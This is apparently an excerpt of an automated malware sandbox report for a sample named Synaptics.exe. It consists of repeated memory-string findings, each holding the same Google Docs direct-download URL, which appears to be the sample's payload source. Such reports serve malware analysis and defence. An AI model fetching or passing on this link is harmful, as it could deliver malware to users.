                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2445635497.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWH
                              Source: Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX;
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXSY
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY%P
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY4
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYI
                              Source: Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1610949341.0000000007247000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ$S
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZH
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZy
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_#V
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_G
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_w
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada$X
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada-wo
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaH
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadal
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadal-sHU)
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadale=1a
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadanalyk
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb#
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbF
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbG
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbUC
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbl~K
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2445635497.00000000007BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc6
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcW
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadclN
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.com
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.net
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcnB
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcnT
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                              Source: Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd5
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.cn
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.com
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade9
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeZ
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadec
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf8
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfG
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfPG
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfY
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfev
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfx-
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000003.00000002.2445635497.00000000007BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgA
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgF
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgTF
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl
                              Source: Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgp
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgs
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgv
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh9
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhQI
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhZ
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhi
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi#
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiG
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiUH
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjD
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjF
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjI
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjTK
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjzQ
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk5
